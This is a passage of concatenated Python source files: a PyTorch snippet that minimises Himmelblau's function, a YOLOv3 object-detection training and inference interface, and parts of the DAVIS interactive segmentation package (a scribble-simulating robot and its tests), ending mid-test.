# It has four basins; gradient descent from different starting points converges to different minima
def himmelblau(x):
return (x[0]**2+x[1]-11)**2+(x[0]+x[1]**2-7)**2
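# Himmelblau's function has four local minima with f = 0: (3.0, 2.0), (-2.805118, 3.131312), (-3.779310, -3.283186), (3.584428, -1.848126)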
draw3D_func(himmelblau) # plot the function surface
x=torch.tensor([0.,0.],requires_grad=True)
optimizer=torch.optim.Adam([x,])
for step in range(20001):
if step:
optimizer.zero_grad()
f.backward() # f.backward() finds a local minimum; use (-f).backward() instead to find a local maximum
optimizer.step()
f=himmelblau(x)
if step % 1000 ==0:
print ('step {}: x = {}, f(x) = {}, grad = {}'.format(step, x.tolist(), f, x.grad))
``` |
{
"source": "JintuZheng/zisan",
"score": 2
} |
#### File: zisan/ObjDetect/Interface.py
```python
import argparse
import time
import torch.distributed as dist
import torch.optim as optim
import torch.optim.lr_scheduler as lr_scheduler
from torch.utils.data import DataLoader
from .test import test # Import test.py to get mAP after each epoch
from .models import *
from .utils.datasets import *
from .utils.utils import *
from glob import glob
import os
import random
import xml.etree.ElementTree as ET
import pickle
import os
from os import listdir, getcwd
from os.path import join
import shutil
import cv2
import warnings
warnings.filterwarnings('ignore')
class ObjDetect_Preprocess(object):
def __init__(self,classnames=['REC'],currentpath='',datapath='data',xmlpath='Annotations',setspath='ImageSets',labelpath='labels',imgspath='images'):
self.sets = ['train', 'test', 'val']
self.datapath=currentpath+'/'+datapath
self.classes = classnames
self.xmlpath=self.datapath+'/'+xmlpath
self.setspath=self.datapath+'/'+setspath
self.labelspath=self.datapath+'/'+labelpath
self.imgspath=self.datapath+'/'+imgspath
self.makeDataLog()
self.makeTxt()
self.voc_label_make()
def makeDataLog(self):
names=open(self.datapath+'/classes.names','w')
for i,item in enumerate(self.classes):
names.write(item)
if i != (len(self.classes)-1):
names.write('\n')
#shapefile=open(self.datapath+'/pics.shapes','w')
globalconfig = open(self.datapath+'/global_config.data','w')
#ids=['classes=','train=','names=','backup=','eval=']
globalconfig.write('classes='+str(len(self.classes))+'\n')
globalconfig.write('train='+str(self.datapath+'/train.txt\n'))
globalconfig.write('valid='+str(self.datapath+'/test.txt\n'))
globalconfig.write('names='+self.datapath+'/classes.names\n')
globalconfig.write('eval=MYSET\n')
globalconfig.write('backup=backup')
def makeTxt(self):
trainval_percent = 0.1
train_percent = 0.9
xmlfilepath = self.xmlpath
txtsavepath = self.setspath
total_xml = os.listdir(xmlfilepath)
num = len(total_xml)
list = range(num)
tv = int(num * trainval_percent)
tr = int(tv * train_percent)
trainval = random.sample(list, tv)
train = random.sample(trainval, tr)
ftrainval = open(txtsavepath+'/trainval.txt', 'w')
ftest = open(txtsavepath+'/test.txt', 'w')
ftrain = open(txtsavepath+'/train.txt', 'w')
fval = open(txtsavepath+'/val.txt', 'w')
for i in list:
name = total_xml[i][:-4] + '\n'
if i in trainval:
ftrainval.write(name)
if i in train:
ftest.write(name)
else:
fval.write(name)
else:
ftrain.write(name)
ftrainval.close()
ftrain.close()
fval.close()
ftest.close()
def convert(self,size, box):
dw = 1. / size[0]
dh = 1. / size[1]
x = (box[0] + box[1]) / 2.0
y = (box[2] + box[3]) / 2.0
w = box[1] - box[0]
h = box[3] - box[2]
x = x * dw
w = w * dw
y = y * dh
h = h * dh
return (x, y, w, h)
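    # Worked example (a sketch): for an image of size (w=640, h=480) and a VOC box
    # (xmin=100, xmax=300, ymin=150, ymax=350), convert((640, 480), (100, 300, 150, 350))
    # returns roughly (0.3125, 0.5208, 0.3125, 0.4167), i.e. the normalized YOLO
    # (x_center, y_center, width, height).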
def convert_annotation(self,image_id):
in_file = open(self.xmlpath+'/%s.xml' % (image_id))
out_file = open(self.labelspath+'/%s.txt' % (image_id), 'w')
tree = ET.parse(in_file)
root = tree.getroot()
size = root.find('size')
w = int(size.find('width').text)
h = int(size.find('height').text)
for obj in root.iter('object'):
# difficult = obj.find('difficult').text #2020_2_6
cls = obj.find('name').text
#if cls not in self.classes or int(difficult) == 1:
if cls not in self.classes:
continue
cls_id = self.classes.index(cls)
xmlbox = obj.find('bndbox')
b = (float(xmlbox.find('xmin').text), float(xmlbox.find('xmax').text), float(xmlbox.find('ymin').text),
float(xmlbox.find('ymax').text))
bb = self.convert((w, h), b)
out_file.write(str(cls_id) + " " + " ".join([str(a) for a in bb]) + '\n')
def voc_label_make(self):
wd = getcwd()
#print(wd)
for image_set in self.sets:
if not os.path.exists(self.labelspath+'/'):
os.makedirs(self.labelspath+'/')
image_ids = open(self.setspath+'/%s.txt' % (image_set)).read().strip().split()
list_file = open(self.datapath+'/%s.txt' % (image_set), 'w')
for image_id in image_ids:
list_file.write(self.imgspath+'/%s.jpg\n' % (image_id))
self.convert_annotation(image_id)
list_file.close()
def clear_data(self,is_all=False):
if is_all==True:
shutil.rmtree(self.datapath)
os.mkdir(self.datapath)
os.mkdir(self.datapath+'\Annotations')
os.mkdir(self.datapath+'\images')
os.mkdir(self.datapath+'\ImageSets')
os.mkdir(self.datapath+'\labels')
else:
for i in glob(self.datapath+'/*.txt'):
os.remove(i)
for i in glob(self.datapath+'/*.names'):
os.remove(i)
for i in glob(self.datapath+'/*.data'):
os.remove(i)
for i in glob(self.labelspath+'/*.txt'):
os.remove(i)
for i in glob(self.setspath+'/*.txt'):
os.remove(i)
os.remove(self.datapath+'/pics.shapes')
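# Usage sketch for the preprocessing class above (paths and class names are hypothetical;
# data/Annotations must hold VOC-style XML files and data/images the matching .jpg files):
#   prep = ObjDetect_Preprocess(classnames=['REC'], currentpath='/path/to/project')
#   # this writes classes.names, global_config.data, ImageSets/*.txt and labels/*.txt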
class ObjDetect_train(object):
def __init__(self,currentpath):
        # hyperparameters evolved with: train.py --evolve --epochs 2 --img-size 320; metrics: 0.204 0.302 0.175 0.234 (square smart)
self.hyp = {'xy': 0.1, # xy loss gain (giou is about 0.02)
'wh': 0.1, # wh loss gain
'cls': 0.04, # cls loss gain
'conf': 4.5, # conf loss gain
'iou_t': 0.5, # iou target-anchor training threshold
'lr0': 0.001, # initial learning rate
'lrf': -4., # final learning rate = lr0 * (10 ** lrf)
'momentum': 0.90, # SGD momentum
'weight_decay': 0.0005} # optimizer weight decay
#default:
self.currentpath=currentpath
self.global_epochs=68
self.global_batch_size=8
self.global_accumulate=8
self.global_cfg=currentpath+'/cfgs/yolov3-spp.cfg'
self.global_data_cfg=currentpath+'/data/global_config.data'
self.global_multi_scale=False
self.global_img_size=416
self.global_resume=False
self.global_transfer=False
self.global_num_workers=4
        self.global_backend='nccl'
self.global_nosave=False
self.global_notest=False
self.global_evolve=False
self.global_var=0
self.Outputpath=self.currentpath+'/weights/'
self.weightspath=self.currentpath+'/weights/'
self.device= torch_utils.select_device()
def rawtrain(self,
cfg,
data_cfg,
img_size=416,
resume=False,
epochs=100, # 500200 batches at bs 4, 117263 images = 68 epochs
batch_size=16,
accumulate=4, # effective bs = 64 = batch_size * accumulate
freeze_backbone=False,
transfer=False # Transfer learning (train only YOLO layers)
):
self.rect=False
if isinstance(img_size,int):
self.rect=False
else:
self.rect=True
init_seeds()
weights = self.weightspath
output=self.Outputpath
latest = output + 'latest.pth'
best = output + 'best.pth'
torch.backends.cudnn.benchmark = True # possibly unsuitable for multiscale
img_size_test = img_size # image size for testing
if self.global_multi_scale:
img_size_min = round(img_size / 32 / 1.5)
img_size_max = round(img_size / 32 * 1.5)
img_size = img_size_max * 32 # initiate with maximum multi_scale size
# Configure run
data_dict = parse_data_cfg(data_cfg)
train_path = data_dict['train']
nc = int(data_dict['classes']) # number of classes
# Initialize model
model = Darknet(cfg).to(self.device)
# Optimizer
optimizer = optim.SGD(model.parameters(), lr=self.hyp['lr0'], momentum=self.hyp['momentum'], weight_decay=self.hyp['weight_decay'])
cutoff = -1 # backbone reaches to cutoff layer
start_epoch = 0
best_loss = float('inf')
nf = int(model.module_defs[model.yolo_layers[0] - 1]['filters']) # yolo layer size (i.e. 255)
##################################################################################################
if resume: # Load previously saved model
if transfer: # Transfer learning
chkpt = torch.load(weights + 'yolov3-spp.pth', map_location=self.device)
model.load_state_dict({k: v for k, v in chkpt['model'].items() if v.numel() > 1 and v.shape[0] != 255},
strict=False)
for p in model.parameters():
p.requires_grad = True if p.shape[0] == nf else False
else: # resume from latest.pth
chkpt = torch.load(latest, map_location=self.device) # load checkpoint
model.load_state_dict(chkpt['model'])
start_epoch = chkpt['epoch'] + 1
if chkpt['optimizer'] is not None:
optimizer.load_state_dict(chkpt['optimizer'])
best_loss = chkpt['best_loss']
del chkpt
else: # Initialize model with backbone (optional)
if '-tiny.cfg' in cfg:
cutoff = load_darknet_weights(model, weights + 'yolov3-tiny.weights')
elif '-spp.cfg' in cfg:
cutoff = load_darknet_weights(model, weights + 'yolov3-spp.weights')
elif 'v3.cfg' in cfg:
cutoff = load_darknet_weights(model, weights + 'yolov3.weights')
# scheduler = lr_scheduler.LambdaLR(optimizer, lr_lambda=lf)
scheduler = lr_scheduler.MultiStepLR(optimizer, milestones=[round(self.global_epochs * x) for x in (0.8, 0.9)], gamma=0.1)
scheduler.last_epoch = start_epoch - 1
# Dataset
dataset = LoadImagesAndLabels(train_path,
img_size,
batch_size,
augment=True,
rect=self.rect)
# Dataloader
dataloader = DataLoader(dataset,
batch_size=batch_size,
num_workers=self.global_num_workers,
shuffle=True, # disable rectangular training if True
pin_memory=True,
collate_fn=dataset.collate_fn)
mixed_precision = False
if mixed_precision:
from apex import amp
model, optimizer = amp.initialize(model, optimizer, opt_level='O1')
# Remove old results
for f in glob('*_batch*.jpg') + glob('results.txt'):
os.remove(f)
# Start training
        model.hyp = self.hyp # attach hyperparameters to the model
model.class_weights = labels_to_class_weights(dataset.labels, nc).to(self.device) # attach class weights
model_info(model)
nb = len(dataloader)
maps = np.zeros(nc) # mAP per class
results = (0, 0, 0, 0, 0) # P, R, mAP, F1, test_loss
n_burnin = min(round(nb / 5 + 1), 1000) # burn-in batches
t, t0 = time.time(), time.time()
Endepoch=0
for epoch in range(start_epoch, epochs):
model.train()
print(('\n%8s%12s' + '%10s' * 7) % ('Epoch', 'Batch', 'xy', 'wh', 'conf', 'cls', 'total', 'targets', 'time'))
# Update scheduler
scheduler.step()
# Freeze backbone at epoch 0, unfreeze at epoch 1 (optional)
if freeze_backbone and epoch < 2:
for name, p in model.named_parameters():
if int(name.split('.')[1]) < cutoff: # if layer < 75
p.requires_grad = False if epoch == 0 else True
# # Update image weights (optional)
# w = model.class_weights.cpu().numpy() * (1 - maps) # class weights
# image_weights = labels_to_image_weights(dataset.labels, nc=nc, class_weights=w)
# dataset.indices = random.choices(range(dataset.n), weights=image_weights, k=dataset.n) # random weighted index
mloss = torch.zeros(5).to(self.device) # mean losses
for i, (imgs, targets, _, _) in enumerate(dataloader):
imgs = imgs.to(self.device)
targets = targets.to(self.device)
# Multi-Scale training
if self.global_multi_scale:
if (i + 1 + nb * epoch) % 10 == 0: # adjust (67% - 150%) every 10 batches
img_size = random.choice(range(img_size_min, img_size_max + 1)) * 32
print('img_size = %g' % img_size)
scale_factor = img_size / max(imgs.shape[-2:])
imgs = F.interpolate(imgs, scale_factor=scale_factor, mode='bilinear', align_corners=False)
# Plot images with bounding boxes
if i == (len(dataloader)-1):
plot_images(imgs=imgs, targets=targets, fname='{}train_batch{}.jpg'.format(epoch,i))
# SGD burn-in
if epoch == 0 and i <= n_burnin:
lr = self.hyp['lr0'] * (i / n_burnin) ** 4
for x in optimizer.param_groups:
x['lr'] = lr
# Run model
pred = model(imgs)
# Compute loss
loss, loss_items = compute_loss(pred, targets, model)
if torch.isnan(loss):
print('WARNING: nan loss detected, ending training')
return results
# Compute gradient
if mixed_precision:
with amp.scale_loss(loss, optimizer) as scaled_loss:
scaled_loss.backward()
else:
loss.backward()
# Accumulate gradient for x batches before optimizing
if (i + 1) % accumulate == 0 or (i + 1) == nb:
optimizer.step()
optimizer.zero_grad()
# Print batch results
mloss = (mloss * i + loss_items) / (i + 1) # update mean losses
s = ('%8s%12s' + '%10.3g' * 7) % (
'%g/%g' % (epoch, epochs - 1),
'%g/%g' % (i, nb - 1), *mloss, len(targets), time.time() - t)
t = time.time()
print(s)
            # Calculate mAP (always test the final epoch; skip the first 10 epochs when nosave is set)
if not (self.global_notest or (self.global_nosave and epoch < 10)) or epoch == epochs - 1:
with torch.no_grad():
results, maps = test(cfg, data_cfg, batch_size=batch_size, img_size=img_size_test, model=model,
conf_thres=0.1)
# Write epoch results
with open('results.txt', 'a') as file:
file.write(s + '%11.3g' * 5 % results + '\n') # P, R, mAP, F1, test_loss
# Update best loss
test_loss = results[4]
if test_loss < best_loss:
best_loss = test_loss
# Save training results
save = (not self.global_nosave) or (epoch == epochs - 1)
if save:
# Create checkpoint
chkpt = {'epoch': epoch,
'best_loss': best_loss,
'model': model.module.state_dict() if type(
model) is nn.parallel.DistributedDataParallel else model.state_dict(),
'optimizer': optimizer.state_dict()}
# Save latest checkpoint
torch.save(chkpt, latest)
# Save best checkpoint
if best_loss == test_loss:
torch.save(chkpt, best)
# Save backup every 10 epochs (optional)
if epoch > 0 and epoch % 10 == 0:
torch.save(chkpt, weights + 'backup%g.pth' % epoch)
# Delete checkpoint
del chkpt
Endepoch=epoch
dt = (time.time() - t0) / 3600
print('%g epochs completed in %.3f hours.' % (Endepoch - start_epoch + 1, dt))
return results
def print_mutation(self,hyp,results):
# Write mutation results
        a = '%11s' * len(hyp) % tuple(hyp.keys()) # hyperparameter keys
        b = '%11.4g' * len(hyp) % tuple(hyp.values()) # hyperparameter values
c = '%11.3g' * len(results) % results # results (P, R, mAP, F1, test_loss)
print('\n%s\n%s\nEvolved fitness: %s\n' % (a, b, c))
with open('evolve.txt', 'a') as f:
f.write(c + b + '\n')
def Run(self,
epochs=68,
batch_size=8,
accumulate=8,
cfg='yolov3-spp.cfg',
multi_scale=False,
img_size=416,
resume=False,
transfer=False,
num_workers=4,
            backend='nccl',
nosave=False,
notest=False,
evolve=False,
var=0
):
self.global_epochs=epochs
self.global_batch_size=batch_size
self.global_accumulate=accumulate
self.global_cfg=self.currentpath+'/cfgs/'+cfg
self.global_multi_scale=multi_scale
self.global_img_size=img_size
self.global_resume=resume
self.global_transfer=transfer
self.global_num_workers=num_workers
self.global_backend=backend
self.global_nosave=nosave
self.global_notest=notest
self.global_evolve=evolve
self.global_var=var
if self.global_evolve:
self.global_notest = True # save time by only testing final epoch
self.global_nosave = True # do not save checkpoints
# Train
results = self.rawtrain(
self.global_cfg,
self.global_data_cfg,
img_size=self.global_img_size,
resume=self.global_resume or self.global_transfer,
transfer=self.global_transfer,
epochs=self.global_epochs,
batch_size=self.global_batch_size,
accumulate=self.global_accumulate
)
        # Evolve hyperparameters (optional)
if self.global_evolve:
best_fitness = results[2] # use mAP for fitness
# Write mutation results
self.print_mutation(self.hyp, results)
gen = 1000 # generations to evolve
for _ in range(gen):
                # Mutate hyperparameters
old_hyp = self.hyp.copy()
init_seeds(seed=int(time.time()))
s = [.3, .3, .3, .3, .3, .3, .3, .03, .3] # xy, wh, cls, conf, iou_t, lr0, lrf, momentum, weight_decay
for i, k in enumerate(self.hyp.keys()):
x = (np.random.randn(1) * s[i] + 1) ** 1.1 # plt.hist(x.ravel(), 100)
self.hyp[k] = self.hyp[k] * float(x) # vary by about 30% 1sigma
# Clip to limits
keys = ['lr0', 'iou_t', 'momentum', 'weight_decay']
limits = [(1e-4, 1e-2), (0, 0.90), (0.70, 0.99), (0, 0.01)]
for k, v in zip(keys, limits):
self.hyp[k] = np.clip(self.hyp[k], v[0], v[1])
# Determine mutation fitness
                results = self.rawtrain(
self.global_cfg,
self.global_data_cfg,
img_size=self.global_img_size,
resume=self.global_resume or self.global_transfer,
transfer=self.global_transfer,
epochs=self.global_epochs,
batch_size=self.global_batch_size,
accumulate=self.global_accumulate
)
mutation_fitness = results[2]
# Write mutation results
self.print_mutation(self.hyp, results)
                # Update hyperparameters if fitness improved
if mutation_fitness > best_fitness:
# Fitness improved!
print('Fitness improved!')
best_fitness = mutation_fitness
else:
                    self.hyp = old_hyp.copy() # reset hyp to the previous values
class ObjDetect_detect(object):
def __init__(self,cfg,currentpath='',img_size=416):
self.currentpath=currentpath
self.cfg=currentpath+'/cfgs/'+cfg
self.data_cfg=currentpath+'/data/global_config.data'
self.device= torch_utils.select_device()
# Initialize model
self.model = Darknet(self.cfg, img_size)
# Load weights
self.weightspath=currentpath+'/weights/best.pth'
'''
if '-tiny.cfg' in cfg:
self.weightspath=currentpath+'/weights/' + 'yolov3-tiny.weights'
elif '-spp.cfg' in cfg:
self.weightspath=currentpath+'/weights/' + 'yolov3-spp.weights'
elif 'v3.cfg' in cfg:
self.weightspath=currentpath+'/weights/'+ 'yolov3.weights'
'''
self.model.load_state_dict(torch.load(self.weightspath, map_location=self.device)['model'])
# Fuse Conv2d + BatchNorm2d layers
self.model.fuse()
# Eval mode
self.model.to(self.device).eval()
def detect_from_RGBimg(self,
img,
img_size_hw=(416,416), #hw
conf_thres=0.5,
nms_thres=0.5,
is_showPreview=False,
log_print=False):
#img=img.resize((img_size_hw[1],img_size_hw[0]),Image.ANTIALIAS) #resize
        img=np.array(img,dtype=np.uint8) # convert the PIL image to a numpy array
model=self.model
classes = load_classes(parse_data_cfg(self.data_cfg)['names'])
colors = [[random.randint(0, 255) for _ in range(3)] for _ in range(len(classes))]
im0=img.copy() # copy raw RGB
#print(img.shape)
img = np.ascontiguousarray(img, dtype=np.float32) # uint8 to float32
img /= 255.0 # 0 - 255 to 0.0 - 1.0
img = torch.from_numpy(img).unsqueeze(0).to(self.device) # add dim and change to float
#print(img.shape)
        img=img.permute(0,3,1,2) # reorder dimensions: NHWC -> NCHW
#print(img.shape)
pred, _ = model(img)
det = non_max_suppression(pred, conf_thres, nms_thres)[0]
t = time.time()
result_boxes=[]
if det is not None and len(det) > 0:
# Rescale boxes from 416 to true image size
det[:, :4] = scale_coords(img.shape[2:], det[:, :4], im0.shape).round()
# Print results to screen
#print('%gx%g ' % img.shape[2:], end='') # print image size
for c in det[:, -1].unique():
n = (det[:, -1] == c).sum()
if log_print:
print('%g %s\n' % (n, classes[int(c)]))
sp='%g'%(n)
# Draw bounding boxes and labels of detections
for *xyxy, conf, cls_conf, cls in det:
#print(cls_conf)
# Add bbox to the image
label = '%s' % (classes[int(cls)])
c1, c2 = (int(xyxy[0]), int(xyxy[1])), (int(xyxy[2]), int(xyxy[3]))
if log_print:
print("find:x[%d %d],y[%d %d]"%(c1[0],c2[0],c1[1],c2[1]))
plot_one_box(xyxy, im0, label=label, color=colors[int(cls)])
box={'class':classes[int(cls)],'x0':c1[0],'x1':c2[0],'y0':c1[1],'y1':c2[1]}
result_boxes.append(box)
if log_print:
print('Done. (%.3fs)' % (time.time() - t))
if is_showPreview: # Save image with detections
            im0[:,:,(0,1,2)]=im0[:,:,(2,1,0)] # swap channels RGB -> BGR for OpenCV display
cv2.imshow('PreviewDetect',im0)
cv2.waitKey(0)
        #im0[:,:,(0,1,2)]=im0[:,:,(2,1,0)] # swap channels back if needed
return result_boxes,im0
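    # Usage sketch (a minimal illustration; the paths are hypothetical and
    # weights/best.pth must already exist under currentpath):
    #   detector = ObjDetect_detect(cfg='yolov3-spp.cfg', currentpath='/path/to/project')
    #   img = Image.open('sample.jpg').convert('RGB')
    #   boxes, preview = detector.detect_from_RGBimg(img, conf_thres=0.5)
    #   # boxes is a list of dicts with keys 'class', 'x0', 'x1', 'y0', 'y1'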
```
#### File: Seg/davisinteractive/logging_test.py
```python
import unittest
from davisinteractive import logging
class TestLogging:
def test_level(self, caplog):
logging.set_verbosity(logging.WARN)
logging.info('Test info')
assert not caplog.records
logging.warning('Test warn')
assert len(caplog.records) == 1
record = caplog.records[0]
assert record.levelname == 'WARNING'
assert record.msg == 'Test warn'
def test_verbose(self, caplog):
logging.set_verbosity(logging.WARN)
logging.verbose('Test verbose')
assert not caplog.records
logging.set_verbosity(logging.INFO)
logging.verbose('Test verbose')
assert len(caplog.records) == 1
record = caplog.records[0]
assert record.levelname == 'INFO'
assert record.msg == 'Test verbose'
caplog.clear()
logging.set_info_level(1)
logging.verbose('Test verbose 2', 2)
assert not caplog.records
```
#### File: davisinteractive/robot/interactive_robot.py
```python
from __future__ import absolute_import, division
import time
import networkx as nx
import numpy as np
from scipy.ndimage import binary_dilation, binary_erosion
from scipy.special import comb
from skimage.filters import rank
from skimage.morphology import dilation, disk, erosion, medial_axis
from sklearn.neighbors import radius_neighbors_graph
from .. import logging
from ..metrics import batched_jaccard
from ..utils.operations import bezier_curve
__all__ = ['InteractiveScribblesRobot']
class InteractiveScribblesRobot(object):
""" Robot that generates realistic scribbles simulating human interaction.
# Attributes
kernel_size: Float. Fraction of the square root of the area used
to compute the dilation and erosion before computing the
skeleton of the error masks.
max_kernel_radius: Float. Maximum kernel radius when applying
dilation and erosion. Default 16 pixels.
min_nb_nodes: Integer. Number of nodes necessary to keep a connected
graph and convert it into a scribble.
nb_points: Integer. Number of points to sample the bezier curve
when converting the final paths into curves.
"""
def __init__(self,
kernel_size=.15,
max_kernel_radius=16,
min_nb_nodes=4,
nb_points=1000):
""" Robot constructor
"""
if kernel_size >= 1. or kernel_size < 0:
raise ValueError('kernel_size must be a value between [0, 1).')
self.kernel_size = kernel_size
self.max_kernel_radius = max_kernel_radius
self.min_nb_nodes = min_nb_nodes
self.nb_points = nb_points
def _generate_scribble_mask(self, mask):
""" Generate the skeleton from a mask
Given an error mask, the medial axis is computed to obtain the
        skeleton of the objects. In order to obtain a smoother skeleton and
        remove small objects, erosion and dilation operations are performed.
        The kernel size used is proportional to the square root of the error area.
# Arguments
mask: Numpy Array. Error mask
Returns:
skel: Numpy Array. Skeleton mask
"""
mask = np.asarray(mask, dtype=np.uint8)
side = np.sqrt(np.sum(mask > 0))
mask_ = mask
# kernel_size = int(self.kernel_size * side)
kernel_radius = self.kernel_size * side * .5
kernel_radius = min(kernel_radius, self.max_kernel_radius)
logging.verbose(
'Erosion and dilation with kernel radius: {:.1f}'.format(
kernel_radius), 2)
compute = True
while kernel_radius > 1. and compute:
kernel = disk(kernel_radius)
mask_ = rank.minimum(mask.copy(), kernel)
mask_ = rank.maximum(mask_, kernel)
compute = False
if mask_.astype(np.bool).sum() == 0:
compute = True
prev_kernel_radius = kernel_radius
kernel_radius *= .9
logging.verbose('Reducing kernel radius from {:.1f} '.format(
prev_kernel_radius) +
'pixels to {:.1f}'.format(kernel_radius), 1)
mask_ = np.pad(
mask_, ((1, 1), (1, 1)), mode='constant', constant_values=False)
skel = medial_axis(mask_.astype(np.bool))
skel = skel[1:-1, 1:-1]
return skel
def _mask2graph(self, skeleton_mask):
""" Transforms a skeleton mask into a graph
Args:
skeleton_mask (ndarray): Skeleton mask
Returns:
tuple(nx.Graph, ndarray): Returns a tuple where the first element
is a Graph and the second element is an array of xy coordinates
indicating the coordinates for each Graph node.
If an empty mask is given, None is returned.
"""
mask = np.asarray(skeleton_mask, dtype=np.bool)
if np.sum(mask) == 0:
return None
h, w = mask.shape
x, y = np.arange(w), np.arange(h)
X, Y = np.meshgrid(x, y)
X, Y = X.ravel(), Y.ravel()
M = mask.ravel()
X, Y = X[M], Y[M]
points = np.c_[X, Y]
G = radius_neighbors_graph(points, np.sqrt(2), mode='distance')
T = nx.from_scipy_sparse_matrix(G)
return T, points
def _acyclics_subgraphs(self, G):
""" Divide a graph into connected components subgraphs
Divide a graph into connected components subgraphs and remove its
cycles removing the edge with higher weight inside the cycle. Also
        prune the subgraphs that do not have enough
nodes.
Args:
G (nx.Graph): Graph
Returns:
list(nx.Graph): Returns a list of graphs which are subgraphs of G
with cycles removed.
"""
if not isinstance(G, nx.Graph):
raise TypeError('G must be a nx.Graph instance')
S = [] # List of subgraphs of G
for c in nx.connected_components(G):
g = G.subgraph(c).copy()
# Remove all cycles that we may find
has_cycles = True
while has_cycles:
try:
cycle = nx.find_cycle(g)
weights = np.asarray([G[u][v]['weight'] for u, v in cycle])
idx = weights.argmax()
# Remove the edge with highest weight at cycle
g.remove_edge(*cycle[idx])
except nx.NetworkXNoCycle:
has_cycles = False
if len(g) < self.min_nb_nodes:
# Prune small subgraphs
logging.verbose('Remove a small line with {} nodes'.format(
len(g)), 1)
continue
S.append(g)
return S
def _longest_path_in_tree(self, G):
""" Given a tree graph, compute the longest path and return it
Given an undirected tree graph, compute the longest path and return it.
        The approach uses two shortest-path traversals (in a tree the shortest
        path between two nodes is also the only, and hence longest, simple path
        between them). This could be improved but would require implementing it:
https://cs.stackexchange.com/questions/11263/longest-path-in-an-undirected-tree-with-only-one-traversal
Args:
G (nx.Graph): Graph which should be an undirected tree graph
Returns:
list(int): Returns a list of indexes of the nodes belonging to the
longest path.
"""
if not isinstance(G, nx.Graph):
raise TypeError('G must be a nx.Graph instance')
if not nx.is_tree(G):
raise ValueError('Graph G must be a tree (graph without cycles)')
# Compute the furthest node to the random node v
v = list(G.nodes())[0]
distance = nx.single_source_shortest_path_length(G, v)
vp = max(distance.items(), key=lambda x: x[1])[0]
# From this furthest point v' find again the longest path from it
distance = nx.single_source_shortest_path(G, vp)
longest_path = max(distance.values(), key=len)
# Return the longest path
return list(longest_path)
def interact(self,
sequence,
pred_masks,
gt_masks,
nb_objects=None,
frame=None):
""" Interaction of the Scribble robot given a prediction.
Given the sequence and a mask prediction, the robot will return a
scribble in the region that fails the most.
# Arguments
sequence: String. Name of the sequence to interact with.
pred_masks: Numpy Array. Array with the prediction masks. It must
be an integer array with shape (B x H x W), with B being the number
of frames of the sequence.
gt_masks: Numpy Array. Array with the ground truth of the sequence.
It must have the same data type and shape as `pred_masks`.
nb_objects: Integer. Number of objects in the ground truth mask. If
                `None`, the value will be inferred from `gt_masks`. Setting this
value will speed up the computation.
frame: Integer. Frame to generate the scribble. If not given, the
worst frame given by the jaccard will be used.
# Returns
dict: Return a scribble (default representation).
"""
robot_start = time.time()
predictions = np.asarray(pred_masks, dtype=np.int)
annotations = np.asarray(gt_masks, dtype=np.int)
nb_frames = len(annotations)
if nb_objects is None:
obj_ids = np.unique(annotations)
obj_ids = obj_ids[(obj_ids > 0) & (obj_ids < 255)]
nb_objects = len(obj_ids)
obj_ids = [i for i in range(nb_objects + 1)]
# Infer height and width of the sequence
h, w = annotations.shape[1:3]
img_shape = np.asarray([w, h], dtype=np.float)
if frame is None:
jac = batched_jaccard(
annotations, predictions, nb_objects=nb_objects)
worst_frame = jac.argmin()
logging.verbose(
'For sequence {} the worst frames is #{} with Jaccard: {:.3f}'.
format(sequence, worst_frame, jac.min()), 2)
else:
worst_frame = frame
pred, gt = predictions[worst_frame], annotations[worst_frame]
scribbles = [[] for _ in range(nb_frames)]
for obj_id in obj_ids:
logging.verbose(
'Creating scribbles from error mask at object_id={}'.format(
obj_id), 2)
start_time = time.time()
error_mask = (gt == obj_id) & (pred != obj_id)
if error_mask.sum() == 0:
logging.info(
'Error mask of object ID {} is empty. Skip object ID.'.
format(obj_id))
continue
# Generate scribbles
skel_mask = self._generate_scribble_mask(error_mask)
skel_time = time.time() - start_time
logging.verbose(
'Time to compute the skeleton mask: {:.3f} ms'.format(
skel_time * 1000), 2)
if skel_mask.sum() == 0:
continue
G, P = self._mask2graph(skel_mask)
mask2graph_time = time.time() - start_time - skel_time
logging.verbose(
'Time to transform the skeleton mask into a graph: ' +
'{:.3f} ms'.format(mask2graph_time * 1000), 2)
t_start = time.time()
S = self._acyclics_subgraphs(G)
t = (time.time() - t_start) * 1000
logging.verbose(
'Time to split into connected components subgraphs ' +
'and remove the cycles: {:.3f} ms'.format(t), 2)
t_start = time.time()
longest_paths_idx = [self._longest_path_in_tree(s) for s in S]
longest_paths = [P[idx] for idx in longest_paths_idx]
t = (time.time() - t_start) * 1000
logging.verbose(
'Time to compute the longest path on the trees: {:.3f} ms'.
format(t), 2)
t_start = time.time()
scribbles_paths = [
bezier_curve(p, self.nb_points) for p in longest_paths
]
t = (time.time() - t_start) * 1000
logging.verbose(
'Time to compute the bezier curves: {:.3f} ms'.format(t), 2)
end_time = time.time()
logging.verbose(
'Generating the scribble for object id {} '.format(obj_id) +
'took {:.3f} ms'.format((end_time - start_time) * 1000), 2)
# Generate scribbles data file
for p in scribbles_paths:
p /= img_shape
path_data = {
'path': p.tolist(),
'object_id': int(obj_id),
'start_time': start_time,
'end_time': end_time
}
scribbles[worst_frame].append(path_data)
scribbles_data = {'scribbles': scribbles, 'sequence': sequence}
t = time.time() - robot_start
logging.info(('The robot took {:.3f} s to generate all the '
'scribbles for {} objects. Sequence {}.').format(
t, nb_objects, sequence))
return scribbles_data
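    # Usage sketch (shapes and values below are made up for illustration):
    #   robot = InteractiveScribblesRobot()
    #   gt = np.zeros((10, 480, 854), dtype=np.int); gt[5, 100:200, 100:200] = 1
    #   pred = np.zeros((10, 480, 854), dtype=np.int)
    #   scribble = robot.interact('bear', pred, gt)
    #   # the scribble is generated on the frame with the worst Jaccard (frame 5 here)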
```
#### File: davisinteractive/robot/interactive_robot_test.py
```python
from __future__ import absolute_import, division
import json
import unittest
import networkx as nx
import numpy as np
import pytest
from davisinteractive.robot import InteractiveScribblesRobot
from davisinteractive.utils.scribbles import annotated_frames, is_empty
class TestInteractiveScribblesRobot(unittest.TestCase):
def test_generate_scribble_mask_empty(self):
empty_mask = np.zeros((100, 200), dtype=np.bool)
robot = InteractiveScribblesRobot()
skel = robot._generate_scribble_mask(empty_mask)
assert skel.shape == empty_mask.shape
assert np.all(skel == empty_mask)
def test_generate_scribble_mask(self):
empty_mask = np.zeros((100, 200), dtype=np.bool)
squared_mask = empty_mask.copy()
squared_mask[50:100, 100:150] = True
robot = InteractiveScribblesRobot()
skel_squared = robot._generate_scribble_mask(squared_mask)
assert skel_squared.shape == empty_mask.shape
assert np.sum(skel_squared) > 0
def test_mask2graph_empty(self):
